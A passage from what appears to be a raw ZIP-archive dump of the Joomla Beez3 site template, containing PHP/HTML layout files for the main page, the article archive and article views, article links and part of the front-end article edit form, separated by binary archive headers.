$showRightColumn = ($this->countModules('position-3') or $this->countModules('position-6') or $this->countModules('position-8'));
$showbottom      = ($this->countModules('position-9') or $this->countModules('position-10') or $this->countModules('position-11'));
$showleft        = ($this->countModules('position-4') or $this->countModules('position-7') or $this->countModules('position-5'));

if ($showRightColumn === false && $showleft === false)
{
	$showno = 0;
}

JHtml::_('behavior.framework', true);

// Get params
$color          = $this->params->get('templatecolor');
$logo           = $this->params->get('logo');
$navposition    = $this->params->get('navposition');
$headerImage    = $this->params->get('headerImage');
$config         = JFactory::getConfig();
$bootstrap      = explode(',', $this->params->get('bootstrap'));
$option         = JFactory::getApplication()->input->getCmd('option', '');

// Output as HTML5
$this->setHtml5(true);

if (in_array($option, $bootstrap))
{
	// Load optional rtl Bootstrap css and Bootstrap bugfixes
	JHtml::_('bootstrap.loadCss', true, $this->direction);
}

// Add stylesheets
JHtml::_('stylesheet', 'templates/system/css/system.css', array('version' => 'auto'));
JHtml::_('stylesheet', 'position.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', 'layout.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', 'print.css', array('version' => 'auto', 'relative' => true), array('media' => 'print'));
JHtml::_('stylesheet', 'general.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', htmlspecialchars($color, ENT_COMPAT, 'UTF-8') . '.css', array('version' => 'auto', 'relative' => true));

if ($this->direction === 'rtl')
{
	JHtml::_('stylesheet', 'template_rtl.css', array('version' => 'auto', 'relative' => true));
	JHtml::_('stylesheet', htmlspecialchars($color, ENT_COMPAT, 'UTF-8') . '_rtl.css', array('version' => 'auto', 'relative' => true));
}

if ($color === 'image')
{
	$this->addStyleDeclaration("
	.logoheader {
		background: url('" . $this->baseurl . "/" . htmlspecialchars($headerImage) . "') no-repeat right;
	}
	body {
		background: " . $this->params->get('backgroundcolor') . ";
	}");
}

JHtml::_('stylesheet', 'ie7only.css', array('version' => 'auto', 'relative' => true, 'conditional' => 'IE 7'));

// Check for a custom CSS file
JHtml::_('stylesheet', 'user.css', array('version' => 'auto', 'relative' => true));

JHtml::_('bootstrap.framework');

// Add template scripts
JHtml::_('script', 'templates/' . $this->template . '/javascript/md_stylechanger.js', array('version' => 'auto'));
JHtml::_('script', 'templates/' . $this->template . '/javascript/hide.js', array('version' => 'auto'));
JHtml::_('script', 'templates/' . $this->template . '/javascript/respond.src.js', array('version' => 'auto'));
JHtml::_('script', 'templates/' . $this->template . '/javascript/template.js', array('version' => 'auto'));

// Check for a custom js file
JHtml::_('script', 'templates/' . $this->template . '/javascript/user.js', array('version' => 'auto'));

require __DIR__ . '/jsstrings.php';

// Add html5 shiv
JHtml::_('script', 'jui/html5.js', array('version' => 'auto', 'relative' => true, 'conditional' => 'lt IE 9'));
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
	<head>
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=3.0, user-scalable=yes"/>
		<meta name="HandheldFriendly" content="true" />
		<meta name="apple-mobile-web-app-capable" content="YES" />
		<jdoc:include type="head" />
	</head>
	<body id="shadow">
		<div id="all">
			<div id="back">
				<header id="header">
					<div class="logoheader">
						<h1 id="logo">
						<?php if ($logo) : ?>
							<img src="<?php echo $this->baseurl; ?>/<?php echo htmlspecialchars($logo, ENT_QUOTES); ?>"  alt="<?php echo htmlspecialchars($this->params->get('sitetitle')); ?>" />
						<?php endif;?>
						<?php if (!$logo AND $this->params->get('sitetitle')) : ?>
							<?php echo htmlspecialchars($this->params->get('sitetitle')); ?>
						<?php elseif (!$logo AND $config->get('sitename')) : ?>
							<?php echo htmlspecialchars($config->get('sitename')); ?>
						<?php endif; ?>
						<span class="header1">
						<?php echo htmlspecialchars($this->params->get('sitedescription')); ?>
						</span></h1>
					</div><!-- end logoheader -->
					<ul class="skiplinks">
						<li><a href="#main" class="u2"><?php echo JText::_('TPL_BEEZ3_SKIP_TO_CONTENT'); ?></a></li>
						<li><a href="#nav" class="u2"><?php echo JText::_('TPL_BEEZ3_JUMP_TO_NAV'); ?></a></li>
						<?php if ($showRightColumn) : ?>
							<li><a href="#right" class="u2"><?php echo JText::_('TPL_BEEZ3_JUMP_TO_INFO'); ?></a></li>
						<?php endif; ?>
					</ul>
					<h2 class="unseen"><?php echo JText::_('TPL_BEEZ3_NAV_VIEW_SEARCH'); ?></h2>
					<h3 class="unseen"><?php echo JText::_('TPL_BEEZ3_NAVIGATION'); ?></h3>
					<jdoc:include type="modules" name="position-1" />
					<div id="line">
						<div id="fontsize"></div>
						<h3 class="unseen"><?php echo JText::_('TPL_BEEZ3_SEARCH'); ?></h3>
						<jdoc:include type="modules" name="position-0" />
					</div> <!-- end line -->
				</header><!-- end header -->
				<div id="<?php echo $showRightColumn ? 'contentarea2' : 'contentarea'; ?>">
					<div id="breadcrumbs">
						<jdoc:include type="modules" name="position-2" />
					</div>

					<?php if ($navposition === 'left' and $showleft) : ?>
						<nav class="left1 <?php if ($showRightColumn == null) { echo 'leftbigger';} ?>" id="nav">
							<jdoc:include type="modules" name="position-7" style="beezDivision" headerLevel="3" />
							<jdoc:include type="modules" name="position-4" style="beezHide" headerLevel="3" state="0 " />
							<jdoc:include type="modules" name="position-5" style="beezTabs" headerLevel="2"  id="3" />
						</nav><!-- end navi -->
					<?php endif; ?>

					<div id="<?php echo $showRightColumn ? 'wrapper' : 'wrapper2'; ?>" <?php if (isset($showno)){echo 'class="shownocolumns"';}?>>
						<div id="main">

							<?php if ($this->countModules('position-12')) : ?>
								<div id="top">
									<jdoc:include type="modules" name="position-12" />
								</div>
							<?php endif; ?>

							<jdoc:include type="message" />
							<jdoc:include type="component" />

						</div><!-- end main -->
					</div><!-- end wrapper -->

					<?php if ($showRightColumn) : ?>
						<div id="close">
							<a href="#" onclick="auf('right')">
							<span id="bild">
								<?php echo JText::_('TPL_BEEZ3_TEXTRIGHTCLOSE'); ?>
							</span>
							</a>
						</div>

						<aside id="right">
							<h2 class="unseen"><?php echo JText::_('TPL_BEEZ3_ADDITIONAL_INFORMATION'); ?></h2>
							<jdoc:include type="modules" name="position-6" style="beezDivision" headerLevel="3" />
							<jdoc:include type="modules" name="position-8" style="beezDivision" headerLevel="3" />
							<jdoc:include type="modules" name="position-3" style="beezDivision" headerLevel="3" />
						</aside><!-- end right -->
					<?php endif; ?>

					<?php if ($navposition === 'center' and $showleft) : ?>
						<nav class="left <?php if ($showRightColumn == null) { echo 'leftbigger'; } ?>" id="nav" >

							<jdoc:include type="modules" name="position-7"  style="beezDivision" headerLevel="3" />
							<jdoc:include type="modules" name="position-4" style="beezHide" headerLevel="3" state="0 " />
							<jdoc:include type="modules" name="position-5" style="beezTabs" headerLevel="2"  id="3" />

						</nav><!-- end navi -->
					<?php endif; ?>

					<div class="wrap"></div>
				</div> <!-- end contentarea -->
			</div><!-- back -->
		</div><!-- all -->

		<div id="footer-outer">
			<?php if ($showbottom) : ?>
				<div id="footer-inner" >

					<div id="bottom">
						<div class="box box1"> <jdoc:include type="modules" name="position-9" style="beezDivision" headerlevel="3" /></div>
						<div class="box box2"> <jdoc:include type="modules" name="position-10" style="beezDivision" headerlevel="3" /></div>
						<div class="box box3"> <jdoc:include type="modules" name="position-11" style="beezDivision" headerlevel="3" /></div>
					</div>

				</div>
			<?php endif; ?>

			<div id="footer-sub">
				<footer id="footer">
					<jdoc:include type="modules" name="position-14" />
				</footer><!-- end footer -->
			</div>
		</div>
		<jdoc:include type="modules" name="debug" />
	</body>
</html>
PK!�����*beez3/html/com_content/archive/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Template.beez5
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;

if (!$templateparams->get('html5', 0))
{
	require JPATH_BASE.'/components/com_content/views/archive/tmpl/default.php';
	// possibly replace with JPATH_COMPONENT.'/views/...'
} else {
JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

JHtml::_('behavior.caption');
?><div class="archive<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>
<form id="adminForm" action="<?php echo JRoute::_('index.php')?>" method="post">
	<fieldset class="filters">
	<legend class="hidelabeltxt"><?php echo JText::_('JGLOBAL_FILTER_LABEL'); ?></legend>
	<div class="filter-search">
		<?php if ($this->params->get('filter_field') !== 'hide') : ?>
		<label class="filter-search-lbl" for="filter-search"><?php echo JText::_('COM_CONTENT_'.$this->params->get('filter_field').'_FILTER_LABEL').'&#160;'; ?></label>
		<input type="text" name="filter-search" id="filter-search" value="<?php echo $this->escape($this->filter); ?>" class="inputbox" onchange="document.getElementById('adminForm').submit();" />
		<?php endif; ?>

		<?php echo $this->form->monthField; ?>
		<?php echo $this->form->yearField; ?>
		<?php echo $this->form->limitField; ?>
		<button type="submit" class="button"><?php echo JText::_('JGLOBAL_FILTER_BUTTON'); ?></button>
	</div>
	<input type="hidden" name="view" value="archive" />
	<input type="hidden" name="option" value="com_content" />
	<input type="hidden" name="limitstart" value="0" />
	</fieldset>

	<?php echo $this->loadTemplate('items'); ?>
</form>
</div>
<?php } ?>
PK!\��GG0beez3/html/com_content/archive/default_items.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Template.beez5
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;

if (!$templateparams->get('html5', 0))
{
	require JPATH_BASE.'/components/com_content/views/archive/tmpl/default_items.php';
	// possibly replace with JPATH_COMPONENT.'/views/...'
} else {
JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
$params = &$this->params;
?>
<ul id="archive-items">
<?php foreach ($this->items as $i => $item) : ?>
	<li class="row<?php echo $i % 2; ?>">

		<h2>
		<?php if ($params->get('link_titles')) : ?>
			<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid, $item->language)); ?>">
				<?php echo $this->escape($item->title); ?></a>
		<?php else: ?>
				<?php echo $this->escape($item->title); ?>
		<?php endif; ?>
		</h2>


<?php if ($params->get('show_author') or $params->get('show_parent_category') or $params->get('show_category') or $params->get('show_create_date') or $params->get('show_modify_date') or $params->get('show_publish_date') or $params->get('show_hits')) : ?>
 <dl class="article-info">
 <dt class="article-info-term"><?php echo JText::_('COM_CONTENT_ARTICLE_INFO'); ?></dt>
<?php endif; ?>
<?php if ($params->get('show_parent_category')) : ?>
		<dd class="parent-category-name">
			<?php	$title = $this->escape($item->parent_title);
					$url = '<a href="'.JRoute::_(ContentHelperRoute::getCategoryRoute($item->parent_slug)).'">'.$title.'</a>';?>
			<?php if ($item->parent_slug && $params->get('link_parent_category')) : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>

<?php if ($params->get('show_category')) : ?>
		<dd class="category-name">
			<?php	$title = $this->escape($item->category_title);
					$url = '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($item->catslug)) . '">' . $title . '</a>'; ?>
			<?php if ($item->catslug && $params->get('link_category')) : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_create_date')) : ?>
		<dd class="create">
		<?php echo JText::sprintf('COM_CONTENT_CREATED_DATE_ON', JHtml::_('date', $item->created, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_modify_date')) : ?>
		<dd class="modified">
		<?php echo JText::sprintf('COM_CONTENT_LAST_UPDATED', JHtml::_('date', $item->modified, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_publish_date')) : ?>
		<dd class="published">
		<?php echo JText::sprintf('COM_CONTENT_PUBLISHED_DATE_ON', JHtml::_('date', $item->publish_up, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if (!empty($item->author) && $params->get('show_author')) : ?>
	<dd class="createdby">
		<?php $author = $item->created_by_alias ?: $item->author; ?>
			<?php if (!empty($item->contact_link ) &&  $params->get('link_author') == true):?>
				<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', JHtml::_('link', $item->contact_link, $author)); ?>
			<?php else :?>
				<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', $author); ?>
			<?php endif; ?>
	</dd>
<?php endif; ?>
<?php if ($params->get('show_hits')) : ?>
		<dd class="hits">
		<?php echo JText::sprintf('COM_CONTENT_ARTICLE_HITS', $item->hits); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_author') or $params->get('show_category') or $params->get('show_create_date') or $params->get('show_modify_date') or $params->get('show_publish_date') or $params->get('show_hits')) :?>
	 </dl>
<?php endif; ?>

<?php  if ($params->get('show_intro')) :?>
		<div class="intro">
			<?php echo JHtml::_('string.truncate', $item->introtext, $params->get('introtext_limit')); ?>
		</div>

		<?php endif; ?>
	</li>
<?php endforeach; ?>
</ul>
<div id="pagination">
	<span><?php echo $this->pagination->getPagesLinks(); ?></span>
	<span><?php echo $this->pagination->getPagesCounter(); ?></span>
</div>
<?php } ?>
PK!���

0beez3/html/com_content/article/default_links.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Create shortcut
$urls = json_decode($this->item->urls);

// Create shortcuts to some parameters.
$params = $this->item->params;
if ($urls && (!empty($urls->urla) || !empty($urls->urlb) || !empty($urls->urlc))) :
?>
<div class="content-links">
	<ul class="nav nav-tabs nav-stacked">
		<?php
			$urlarray = array(
			array($urls->urla, $urls->urlatext, $urls->targeta, 'a'),
			array($urls->urlb, $urls->urlbtext, $urls->targetb, 'b'),
			array($urls->urlc, $urls->urlctext, $urls->targetc, 'c')
			);
			foreach ($urlarray as $url) :
				$link = $url[0];
				$label = $url[1];
				$target = $url[2];
				$id = $url[3];

				if (!$link) :
					continue;
				endif;

				// If no label is present, take the link
				$label = $label ?: $link;

				// If no target is present, use the default
				$target = $target ?: $params->get('target'.$id);
				?>
			<li class="content-links-<?php echo $id; ?>">
				<?php
					// Compute the correct link

					switch ($target)
					{
						case 1:
							// open in a new window
							echo '<a href="' . htmlspecialchars($link, ENT_COMPAT, 'UTF-8') . '" target="_blank"  rel="nofollow noopener noreferrer">' .
								htmlspecialchars($label, ENT_COMPAT, 'UTF-8') .'</a>';
							break;

						case 2:
							// open in a popup window
							$attribs = 'toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=yes,width=600,height=600';
							echo "<a href=\"" . htmlspecialchars($link, ENT_COMPAT, 'UTF-8') . "\" onclick=\"window.open(this.href, 'targetWindow', '".$attribs."'); return false;\" rel=\"noopener noreferrer\">".
								htmlspecialchars($label, ENT_COMPAT, 'UTF-8').'</a>';
							break;
						case 3:
							// open in a modal window
							JHtml::_('behavior.modal', 'a.modal');
							echo '<a class="modal" href="' . htmlspecialchars($link, ENT_COMPAT, 'UTF-8') . '"  rel="{handler: \'iframe\', size: {x:600, y:600}} noopener noreferrer">'.
								htmlspecialchars($label, ENT_COMPAT, 'UTF-8') . ' </a>';
							break;

						default:
							// open in parent window
							echo '<a href="' .  htmlspecialchars($link, ENT_COMPAT, 'UTF-8') . '" rel="nofollow">'.
								htmlspecialchars($label, ENT_COMPAT, 'UTF-8') . ' </a>';
							break;
					}
				?>
				</li>
		<?php endforeach; ?>
	</ul>
</div>
<?php endif; ?>
PK!M�~%~%*beez3/html/com_content/article/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app            = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;
$images         = json_decode($this->item->images);
$urls           = json_decode($this->item->urls);
$user           = JFactory::getUser();

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
JHtml::_('behavior.caption');

// Create shortcut to parameters.
$params = $this->item->params;

$accessEdit    = $params->get('access-edit');
$showPrintIcon = $params->get('show_print_icon');
$showEmailIcon = $params->get('show_email_icon');

?>
<article class="item-page<?php echo $this->pageclass_sfx?>">
<?php if ($showPageHeading = $this->params->get('show_page_heading')) : ?>

<?php if ($showPageHeading and $params->get('show_title')) :?>
<hgroup>
<?php endif; ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>
<?php
if (!empty($this->item->pagination) && $this->item->pagination && !$this->item->paginationposition && $this->item->paginationrelative)
{
	echo $this->item->pagination;
}

if ($params->get('show_title')) : ?>
		<h2>
			<?php echo $this->escape($this->item->title); ?>
		</h2>
<?php endif; ?>
<?php if ($showPageHeading and $params->get('show_title')) :?>
</hgroup>
<?php endif; ?>

<?php // Content is generated by content plugin event "onContentAfterTitle" ?>
<div class="pull-left"><?php echo $this->item->event->afterDisplayTitle; ?></div>

<?php

if ($accessEdit || $showPrintIcon || $showEmailIcon) : ?>
		<ul class="actions">
		<?php if (!$this->print) : ?>
				<?php if ($showPrintIcon) : ?>
				<li class="print-icon">
						<?php echo JHtml::_('icon.print_popup', $this->item, $params, array(), true); ?>
				</li>
				<?php endif; ?>

				<?php if ($showEmailIcon) : ?>
				<li class="email-icon">
						<?php echo JHtml::_('icon.email', $this->item, $params, array(), true); ?>
				</li>
				<?php endif; ?>
				<?php if ($this->user->authorise('core.edit', 'com_content.article.' . $this->item->id)) : ?>
						<li class="edit-icon">
							<?php echo JHtml::_('icon.edit', $this->item, $params, array(), true); ?>
						</li>
					<?php endif; ?>
		<?php else : ?>
				<li>
						<?php echo JHtml::_('icon.print_screen', $this->item, $params, array(), true); ?>
				</li>
		<?php endif; ?>
		</ul>
<?php endif; ?>

	<?php echo $this->item->event->beforeDisplayContent; ?>

<?php $useDefList = ($params->get('show_author') or $params->get('show_category') or $params->get('show_parent_category')
	or $params->get('show_create_date') or $params->get('show_modify_date') or $params->get('show_publish_date')
	or $params->get('show_hits')); ?>

<?php if ($useDefList) : ?>
 <dl class="article-info">
 <dt class="article-info-term"><?php  echo JText::_('COM_CONTENT_ARTICLE_INFO'); ?></dt>
<?php endif; ?>
<?php if ($this->item->parent_slug !== '1:root' && $params->get('show_parent_category')) : ?>
		<dd class="parent-category-name">
			<?php 	$title = $this->escape($this->item->parent_title);
					$url = '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($this->item->parent_slug)) . '">' . $title . '</a>';?>
			<?php if ($params->get('link_parent_category') and $this->item->parent_slug) : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_category')) : ?>
		<dd class="category-name">
			<?php 	$title = $this->escape($this->item->category_title);
					$url = '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($this->item->catslug)) . '">' . $title . '</a>';?>
			<?php if ($params->get('link_category') and $this->item->catslug) : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_create_date')) : ?>
		<dd class="create">
		<?php echo JText::sprintf('COM_CONTENT_CREATED_DATE_ON', JHtml::_('date', $this->item->created, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_modify_date')) : ?>
		<dd class="modified">
		<?php echo JText::sprintf('COM_CONTENT_LAST_UPDATED', JHtml::_('date', $this->item->modified, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_publish_date')) : ?>
		<dd class="published">
		<?php echo JText::sprintf('COM_CONTENT_PUBLISHED_DATE_ON', JHtml::_('date', $this->item->publish_up, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if (!empty($this->item->author) && $params->get('show_author')) : ?>
	<dd class="createdby">
		<?php $author = $this->item->created_by_alias ?: $this->item->author; ?>
		<?php if (!empty($this->item->contact_link) && $params->get('link_author') == true) : ?>
			<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', JHtml::_('link', $this->item->contact_link, $author)); ?>
		<?php else : ?>
			<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', $author); ?>
		<?php endif; ?>
	</dd>
<?php endif; ?>
<?php if ($params->get('show_hits')) : ?>
		<dd class="hits">
		<?php echo JText::sprintf('COM_CONTENT_ARTICLE_HITS', $this->item->hits); ?>
		</dd>
<?php endif; ?>
<?php if ($useDefList) : ?>
 </dl>
<?php endif; ?>

	<?php if (isset ($this->item->toc)) : ?>
		<?php echo $this->item->toc; ?>
	<?php endif; ?>

<?php if (isset($urls) AND ((!empty($urls->urls_position) AND ($urls->urls_position == '0')) OR ($params->get('urls_position') == '0' AND empty($urls->urls_position)))
		OR (empty($urls->urls_position) AND (!$params->get('urls_position')))) : ?>

	<?php echo $this->loadTemplate('links'); ?>
<?php endif; ?>
	<?php  if (isset($images->image_fulltext) and !empty($images->image_fulltext)) : ?>
	<?php $imgfloat = empty($images->float_fulltext) ? $params->get('float_fulltext') : $images->float_fulltext; ?>

	<div class="img-fulltext-<?php echo htmlspecialchars($imgfloat, ENT_COMPAT, 'UTF-8'); ?>">
	<img
		<?php if ($images->image_fulltext_caption):
			echo 'class="caption"'.' title="' .htmlspecialchars($images->image_fulltext_caption, ENT_COMPAT, 'UTF-8') .'"';
		endif; ?>
		src="<?php echo htmlspecialchars($images->image_fulltext, ENT_COMPAT, 'UTF-8'); ?>" alt="<?php echo htmlspecialchars($images->image_fulltext_alt, ENT_COMPAT, 'UTF-8'); ?>"/>
	</div>
	<?php endif; ?>
<?php
if (!empty($this->item->pagination) AND $this->item->pagination AND !$this->item->paginationposition AND !$this->item->paginationrelative):
	echo $this->item->pagination;
endif;
?>
<?php if ($params->get('access-view')):?>
	<?php echo $this->item->text; ?>
	<?php // Optional teaser intro text for guests ?>
	<?php elseif ($params->get('show_noauth') == true && $user->get('guest')) : ?>
		<?php echo JLayoutHelper::render('joomla.content.intro_image', $this->item); ?>
	<?php echo JHtml::_('content.prepare', $this->item->introtext); ?>
	<?php // Optional link to let them register to see the whole article. ?>
	<?php if ($this->item->fulltext != null && $params->get('show_readmore')) : ?>
		<?php $menu = JFactory::getApplication()->getMenu(); ?>
		<?php $active = $menu->getActive(); ?>
		<?php $itemId = $active->id; ?>
		<?php $link = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false)); ?>
		<?php $link->setVar('return', base64_encode(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language))); ?>
		<p class="readmore">
			<a href="<?php echo $link; ?>" class="register">
			<?php $attribs = json_decode($this->item->attribs); ?>
			<?php if ($attribs->alternative_readmore == null) : ?>
				<?php echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE'); ?>
			<?php elseif ($readmore = $attribs->alternative_readmore) : ?>
				<?php echo $readmore; ?>
				<?php if ($params->get('show_readmore_title', 0) != 0) : ?>
					<?php echo JHtml::_('string.truncate', $this->item->title, $params->get('readmore_limit')); ?>
				<?php endif; ?>
			<?php elseif ($params->get('show_readmore_title', 0) == 0) : ?>
				<?php echo JText::sprintf('COM_CONTENT_READ_MORE_TITLE'); ?>
			<?php else : ?>
				<?php echo JText::_('COM_CONTENT_READ_MORE'); ?>
				<?php echo JHtml::_('string.truncate', $this->item->title, $params->get('readmore_limit')); ?>
			<?php endif; ?>
			</a>
		</p>
	<?php endif; ?>
<?php endif; ?>
<?php // TAGS ?>
<?php if (!empty($this->item->tags->itemTags) && $params->get('show_tags', 1)) : ?>
	<?php $this->item->tagLayout = new JLayoutFile('joomla.content.tags'); ?>
	<?php echo $this->item->tagLayout->render($this->item->tags->itemTags); ?>
<?php endif; ?>
<?php if (!empty($this->item->pagination) AND $this->item->pagination AND $this->item->paginationposition AND!$this->item->paginationrelative) : ?>
	<?php echo $this->item->pagination; ?>
<?php endif; ?>
	<?php if (isset($urls) AND ((!empty($urls->urls_position) AND ($urls->urls_position == '1')) OR ( $params->get('urls_position') == '1'))) : ?>
		<?php echo $this->loadTemplate('links'); ?>
	<?php endif; ?>
<?php if (!empty($this->item->pagination) AND $this->item->pagination AND $this->item->paginationposition AND $this->item->paginationrelative) : ?>
	<?php echo $this->item->pagination; ?>
<?php endif; ?>
	<?php echo $this->item->event->afterDisplayContent; ?>
</article>
PK!�1���,�,$beez3/html/com_content/form/edit.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// no direct access
defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
JHtml::_('behavior.formvalidation');

// Create shortcut to parameters.
$params = $this->state->get('params');
//$images = json_decode($this->item->images);
//$urls = json_decode($this->item->urls);

// This checks if the editor config options have ever been saved. If they haven't they will fall back to the original settings.
$editoroptions = isset($params->show_publishing_options);
if (!$editoroptions):
	$params->show_urls_images_frontend = '0';
endif;

$ignoredFieldsets = array('image-intro', 'image-full', 'jmetadata', 'item_associations');

?>

<script type="text/javascript">
	Joomla.submitbutton = function(task)
	{
		if (task === 'article.cancel' || document.formvalidator.isValid(document.getElementById('adminForm')))
		{
			<?php echo $this->form->getField('articletext')->save(); ?>
			Joomla.submitform(task);
		}
	}
</script>
<div class="edit item-page<?php echo $this->pageclass_sfx; ?>">
<?php if ($params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($params->get('page_heading')); ?>
</h1>
<?php endif; ?>

<form action="<?php echo JRoute::_('index.php?option=com_content&a_id='.(int) $this->item->id); ?>" method="post" name="adminForm" id="adminForm" class="form-validate">
	<fieldset>
		<legend><?php echo JText::_('COM_CONTENT_ARTICLE_CONTENT'); ?></legend>

			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('title'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('title'); ?>
				</div>
			</div>

		<?php if ($this->item->id === null):?>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('alias'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('alias'); ?>
				</div>
			</div>
		<?php endif; ?>

			<div class="btn-group">
				<button type="button" class="btn btn-primary" onclick="Joomla.submitbutton('article.save')">
					<?php echo JText::_('JSAVE') ?>
				</button>
				<button type="button" class="btn" onclick="Joomla.submitbutton('article.cancel')">
					<?php echo JText::_('JCANCEL') ?>
				</button>
			</div>
			<?php if ($this->captchaEnabled) : ?>
				<?php echo $this->form->renderField('captcha'); ?>
			<?php endif; ?>
			<?php echo $this->form->getInput('articletext'); ?>

	</fieldset>
	<?php if ($params->get('show_urls_images_frontend')  ) : ?>
	<fieldset>
		<legend><?php echo JText::_('COM_CONTENT_IMAGES_AND_URLS'); ?></legend>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('image_intro', 'images'); ?>
					<?php echo $this->form->getInput('image_intro', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('image_intro_alt', 'images'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('image_intro_alt', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('image_intro_caption', 'images'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('image_intro_caption', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('float_intro', 'images'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('float_intro', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('image_fulltext', 'images'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('image_fulltext', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('image_fulltext_alt', 'images'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('image_fulltext_alt', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('image_fulltext_caption', 'images'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('image_fulltext_caption', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('float_fulltext', 'images'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('float_fulltext', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('urla', 'urls'); ?>
				</div>
				<div class="controls">
